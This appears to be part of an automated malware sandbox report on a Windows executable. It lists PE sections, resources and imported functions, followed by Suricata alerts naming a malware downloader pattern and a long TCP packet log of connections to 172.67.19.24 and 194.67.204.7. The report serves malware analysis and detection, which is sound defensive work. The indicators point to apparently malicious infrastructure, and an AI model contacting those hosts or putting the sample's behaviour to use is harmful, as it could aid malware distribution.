                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x640000xe51f0xe60087359dd25db4d139d87ccd958f448ad1False0.6252207880434782data6.58339595740304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x730000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            PNG0x646440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                            PNG0x6518c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                            RT_ICON0x667380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                            RT_ICON0x66ca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                            RT_ICON0x675480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                            RT_ICON0x683f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                            RT_ICON0x688580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                            RT_ICON0x699000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                            RT_ICON0x6bea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                            RT_DIALOG0x6fc1c0x2f8dataGermanGermany0.4723684210526316
                                                            RT_DIALOG0x6ff140x160dataGermanGermany0.59375
                                                            RT_DIALOG0x700740xf0dataGermanGermany0.6916666666666667
                                                            RT_DIALOG0x701640x148dataGermanGermany0.5792682926829268
                                                            RT_DIALOG0x702ac0x354dataGermanGermany0.43896713615023475
                                                            RT_DIALOG0x706000x278dataGermanGermany0.5759493670886076
                                                            RT_STRING0x708780x234dataGermanGermany0.39361702127659576
                                                            RT_STRING0x70aac0x268dataGermanGermany0.39285714285714285
                                                            RT_STRING0x70d140x218dataGermanGermany0.416044776119403
                                                            RT_STRING0x70f2c0x1a0dataGermanGermany0.5288461538461539
                                                            RT_STRING0x710cc0x5c4dataGermanGermany0.3313008130081301
                                                            RT_STRING0x716900x1a8dataGermanGermany0.4363207547169811
                                                            RT_STRING0x718380x198dataGermanGermany0.4950980392156863
                                                            RT_STRING0x719d00x168dataGermanGermany0.425
                                                            RT_STRING0x71b380xf0dataGermanGermany0.5791666666666667
                                                            RT_STRING0x71c280x13cdataGermanGermany0.4936708860759494
                                                            RT_GROUP_ICON0x71d640x68dataEnglishUnited States0.7019230769230769
                                                            RT_MANIFEST0x71dcc0x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                            OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                            gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States
                                                            GermanGermany

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-09T14:12:40.786601+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549760172.67.19.2480TCP
                                                            2024-12-09T14:12:53.020544+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549795172.67.19.24443TCP
                                                            2024-12-09T14:13:02.207565+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549819172.67.19.24443TCP
                                                            2024-12-09T14:13:08.614808+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549836172.67.19.2480TCP
                                                            2024-12-09T14:13:11.467632+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549844172.67.19.24443TCP
                                                            2024-12-09T14:13:20.624120+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549869172.67.19.24443TCP
                                                            2024-12-09T14:13:29.787528+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549894172.67.19.24443TCP
                                                            2024-12-09T14:13:36.117241+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549911172.67.19.2480TCP
                                                            2024-12-09T14:13:38.962820+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549919172.67.19.24443TCP
                                                            2024-12-09T14:13:48.479837+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549942172.67.19.24443TCP
                                                            2024-12-09T14:13:54.927268+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549959172.67.19.2480TCP
                                                            2024-12-09T14:13:57.774564+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549968172.67.19.24443TCP
                                                            2024-12-09T14:14:06.899015+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549994172.67.19.24443TCP
                                                            2024-12-09T14:14:13.630369+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550010172.67.19.2480TCP
                                                            2024-12-09T14:14:20.317839+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550021172.67.19.2480TCP
                                                            2024-12-09T14:14:26.523182+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550023172.67.19.2480TCP
                                                            2024-12-09T14:14:34.583291+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550026172.67.19.2480TCP
                                                            2024-12-09T14:14:41.130094+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550028172.67.19.2480TCP
                                                            2024-12-09T14:14:47.676907+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550030172.67.19.2480TCP
                                                            2024-12-09T14:14:54.442475+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550033172.67.19.2480TCP
                                                            2024-12-09T14:15:01.185178+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550036172.67.19.2480TCP
                                                            2024-12-09T14:15:07.864248+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550039172.67.19.2480TCP
                                                            2024-12-09T14:15:22.618944+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550047172.67.19.2480TCP
                                                            2024-12-09T14:15:37.637427+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550053172.67.19.2480TCP
                                                            2024-12-09T14:15:38.178561+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550053172.67.19.2480TCP
                                                            2024-12-09T14:15:44.362516+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550054172.67.19.2480TCP
                                                            2024-12-09T14:15:44.785853+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550054172.67.19.2480TCP
                                                            2024-12-09T14:15:51.334402+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550056172.67.19.2480TCP
                                                            2024-12-09T14:15:57.863773+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550057172.67.19.2480TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 9, 2024 14:12:09.245723009 CET4970480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:09.365972996 CET8049704172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:09.366061926 CET4970480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:09.370579958 CET4970480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:09.489947081 CET8049704172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:10.460917950 CET8049704172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:10.463355064 CET49705443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:10.463407993 CET44349705172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:10.463476896 CET49705443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:10.505367041 CET4970480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:10.550622940 CET49705443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:10.550648928 CET44349705172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:11.767957926 CET44349705172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:11.768126011 CET49705443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:11.771980047 CET49705443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:11.771991014 CET44349705172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:11.772274017 CET44349705172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:11.817878008 CET49705443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:11.825124025 CET49705443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:11.867357969 CET44349705172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:12.400613070 CET44349705172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:12.400711060 CET44349705172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:12.400804043 CET49705443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:12.470053911 CET49705443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:12.485497952 CET4970688192.168.2.5194.67.204.7
                                                            Dec 9, 2024 14:12:12.604994059 CET8849706194.67.204.7192.168.2.5
                                                            Dec 9, 2024 14:12:12.605117083 CET4970688192.168.2.5194.67.204.7
                                                            Dec 9, 2024 14:12:12.605969906 CET4970688192.168.2.5194.67.204.7
                                                            Dec 9, 2024 14:12:12.725224018 CET8849706194.67.204.7192.168.2.5
                                                            Dec 9, 2024 14:12:34.486949921 CET8849706194.67.204.7192.168.2.5
                                                            Dec 9, 2024 14:12:34.487023115 CET4970688192.168.2.5194.67.204.7
                                                            Dec 9, 2024 14:12:39.505662918 CET4970688192.168.2.5194.67.204.7
                                                            Dec 9, 2024 14:12:39.505955935 CET4970480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:39.506767035 CET4976080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:39.625181913 CET8849706194.67.204.7192.168.2.5
                                                            Dec 9, 2024 14:12:39.625825882 CET8049704172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:39.625989914 CET8049760172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:39.626035929 CET4970480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:39.626104116 CET4976080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:39.626308918 CET4976080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:39.745912075 CET8049760172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:40.733129025 CET8049760172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:40.734461069 CET49764443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:40.734515905 CET44349764172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:40.734601974 CET49764443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:40.734874964 CET49764443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:40.734889984 CET44349764172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:40.737926006 CET49764443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:40.740523100 CET4976580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:40.783344984 CET44349764172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:40.786601067 CET4976080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:40.859816074 CET8049765172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:40.859890938 CET4976580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:40.860016108 CET4976580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:40.979269981 CET8049765172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:41.946403027 CET44349764172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:41.946527004 CET44349764172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:41.946657896 CET49764443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:41.951138020 CET49764443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:41.956856966 CET8049765172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:41.958260059 CET49769443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:41.958297968 CET44349769172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:41.958390951 CET49769443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:41.958764076 CET49769443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:41.958776951 CET44349769172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:42.005357027 CET4976580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:43.170602083 CET44349769172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:43.170730114 CET49769443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:43.174676895 CET49769443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:43.174685001 CET44349769172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:43.175102949 CET44349769172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:43.195729971 CET49769443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:43.239327908 CET44349769172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:43.808455944 CET44349769172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:43.808562994 CET44349769172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:43.808629990 CET49769443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:43.809176922 CET49769443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:48.818711996 CET4976580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:48.819469929 CET4978780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:48.940514088 CET8049765172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:48.940562010 CET8049787172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:48.940694094 CET4976580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:48.940752029 CET4978780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:48.940943956 CET4978780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:49.062139988 CET8049787172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:50.116533995 CET8049787172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:50.117472887 CET49789443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:50.117539883 CET44349789172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:50.117592096 CET49789443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:50.120892048 CET4979080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:50.161633015 CET4978780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:50.240370989 CET8049790172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:50.240497112 CET4979080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:50.240664959 CET4979080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:50.359983921 CET8049790172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:51.354226112 CET8049790172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:51.355218887 CET49795443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:51.355249882 CET44349795172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:51.355330944 CET49795443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:51.355551958 CET49795443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:51.355565071 CET44349795172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:51.395999908 CET4979080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:52.566220999 CET44349795172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:52.567933083 CET49795443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:52.567945004 CET44349795172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:53.020562887 CET44349795172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:53.020656109 CET44349795172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:53.020714045 CET49795443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:53.021158934 CET49795443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:58.037354946 CET4978780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:58.037430048 CET4979080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:58.038089037 CET4981280192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:58.160094023 CET8049787172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:58.160188913 CET8049812172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:58.160340071 CET4978780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:58.160394907 CET4981280192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:58.160403967 CET8049790172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:58.160458088 CET4979080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:58.160624981 CET4981280192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:58.280018091 CET8049812172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:59.290079117 CET8049812172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:59.291364908 CET4981580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:59.333484888 CET4981280192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:59.410690069 CET8049815172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:12:59.410800934 CET4981580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:59.410897970 CET4981580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:12:59.530153036 CET8049815172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:00.523938894 CET8049815172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:00.525068045 CET49819443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:00.525110006 CET44349819172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:00.525178909 CET49819443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:00.525422096 CET49819443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:00.525435925 CET44349819172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:00.567851067 CET4981580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:01.758444071 CET44349819172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:01.768342018 CET49819443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:01.768373966 CET44349819172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:02.207564116 CET44349819172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:02.207654953 CET44349819172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:02.207712889 CET49819443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:02.217478037 CET49819443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:07.228652954 CET4981580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:07.230788946 CET4981280192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:07.231262922 CET4983680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:07.348534107 CET8049815172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:07.348592043 CET4981580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:07.350548029 CET8049812172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:07.350601912 CET4981280192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:07.350640059 CET8049836172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:07.350704908 CET4983680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:07.350838900 CET4983680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:07.471275091 CET8049836172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:08.560107946 CET8049836172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:08.561382055 CET49839443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:08.561428070 CET44349839172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:08.561490059 CET49839443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:08.562458992 CET4984080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:08.614808083 CET4983680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:08.681854963 CET8049840172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:08.681945086 CET4984080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:08.682054043 CET4984080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:08.801357031 CET8049840172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:09.794367075 CET8049840172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:09.795490980 CET49844443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:09.795541048 CET44349844172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:09.795608044 CET49844443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:09.795841932 CET49844443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:09.795847893 CET44349844172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:09.849147081 CET4984080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:11.006453991 CET44349844172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:11.008003950 CET49844443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:11.008033991 CET44349844172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:11.467642069 CET44349844172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:11.467750072 CET44349844172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:11.467816114 CET49844443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:11.468195915 CET49844443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.474561930 CET4983680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.474657059 CET4984080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.475445032 CET4986180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.594732046 CET8049836172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:16.594786882 CET8049861172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:16.594810009 CET4983680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.594855070 CET4986180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.594899893 CET8049840172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:16.594949961 CET4984080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.595082998 CET4986180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.715213060 CET8049861172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:17.705460072 CET8049861172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:17.708079100 CET49865443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:17.708138943 CET44349865172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:17.708203077 CET49865443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:17.708256006 CET49865443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:17.715667009 CET4986680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:17.755356073 CET4986180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:17.835078001 CET8049866172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:17.835324049 CET4986680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:17.835493088 CET4986680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:17.954787970 CET8049866172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:18.956958055 CET8049866172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:18.957966089 CET49869443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:18.958014011 CET44349869172.67.19.24192.168.2.5
